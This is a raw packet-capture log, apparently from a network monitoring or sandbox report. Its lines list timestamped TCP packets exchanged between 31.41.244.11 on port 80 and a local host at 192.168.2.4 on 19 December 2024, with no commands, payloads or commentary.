                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.963304996 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.963468075 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.963526011 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.964685917 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.964787960 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.964853048 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.966137886 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.966258049 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.966311932 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.967377901 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.967442989 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.967515945 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.968713999 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.968782902 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.968837023 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.970076084 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.970082045 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.970184088 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.970230103 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.971406937 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.971465111 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.971554041 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.972784996 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.972834110 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.972861052 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.973341942 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.974140882 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.974253893 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.974270105 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.974365950 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.975464106 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.975593090 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.975666046 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.976820946 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.976918936 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.976988077 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.978176117 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.978279114 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.978346109 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.979563951 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.979652882 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.979716063 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.980920076 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.981056929 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.981116056 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.982270956 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.982340097 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.982405901 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.983654022 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.983758926 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.983824968 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.984981060 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.985102892 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.985147953 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.986342907 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.986450911 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.986496925 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.987685919 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.987761974 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.987813950 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.989037037 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.989141941 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.989144087 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.989316940 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.990308046 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:02.992352009 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.109054089 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.109113932 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.109164953 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.109217882 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.109611988 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.109695911 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.109759092 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.110044956 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.110727072 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.110779047 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.110812902 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.110858917 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.111865997 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.111927032 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.111977100 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.112025976 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.112946033 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.112994909 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.113035917 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.113081932 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.114056110 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.114196062 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.114245892 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.115159988 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.115294933 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.115334988 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.115391970 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.116338968 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.116380930 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.116384983 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.117383957 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.117441893 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.117736101 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.118092060 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.118485928 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.118561983 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.118597031 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.118643999 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.119621038 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.119674921 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.119714975 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.119759083 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.120692968 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.120748997 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.120788097 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.120846033 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.121805906 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.121850967 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.121908903 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.121951103 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.122909069 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.122955084 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.122994900 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.123332024 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.124017954 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.124068975 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.124139071 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.124226093 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.125194073 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.125242949 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.125255108 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.125296116 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.126219988 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.126265049 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.126317024 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.126360893 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.127377033 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.127403021 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.127427101 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.127441883 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.128457069 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.128509998 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.128571033 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.128614902 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.129611015 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.129662991 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.129684925 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.129724979 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.130662918 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.130716085 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.130754948 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.130851030 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.131761074 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.131818056 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.131856918 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.132878065 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.132922888 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.132962942 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.133990049 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.134043932 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.134085894 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.134212971 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.135207891 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.135261059 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.135349989 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.135426998 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.136202097 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.136254072 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.136321068 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.136504889 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.137315989 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.137435913 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.137480021 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.138513088 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.138660908 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.138712883 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.139528990 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.139621019 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.139659882 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.139700890 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.140657902 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.140767097 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.140815020 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.141757965 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.141808987 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.141834021 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.142508984 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.142847061 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.142972946 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.142988920 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.143054008 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.143961906 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.144078970 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.144109011 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.144121885 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.145082951 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.145137072 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.145183086 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.145591021 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.146217108 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.146426916 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.146492004 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.147294044 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.147344112 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.147377014 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.147432089 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.148406029 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.148458004 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.148509026 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.148576021 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.149496078 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.149559975 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.149641037 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.149683952 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.150604963 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.150726080 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.150768995 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.151716948 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.151794910 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.151828051 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.151921034 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.152833939 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.152883053 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.152924061 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.152997017 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.153971910 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.154047966 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.154078007 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.154216051 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.155056000 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.155097961 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.155173063 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.155213118 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.156156063 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.156279087 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.156291962 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.156322002 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.157260895 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.157375097 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.157423973 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.158356905 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.158417940 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.158457994 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.158509016 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.159490108 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.159586906 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.159605026 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.159709930 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.160593987 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.160650015 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.160726070 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.160768986 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.161680937 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.161739111 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.161777020 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.162178993 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.162784100 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.162848949 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.162913084 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.163294077 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.163918972 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.163978100 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.164041996 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.164463997 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.165016890 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.165081024 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.165122986 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.165465117 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.166125059 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.166188955 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.166229963 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.166546106 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.167181969 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.167258024 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.301131964 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.301183939 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.301255941 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.301367998 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.301742077 CET804989231.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.301784039 CET4989280192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:03.301892996 CET804989231.41.244.11192.168.2.4
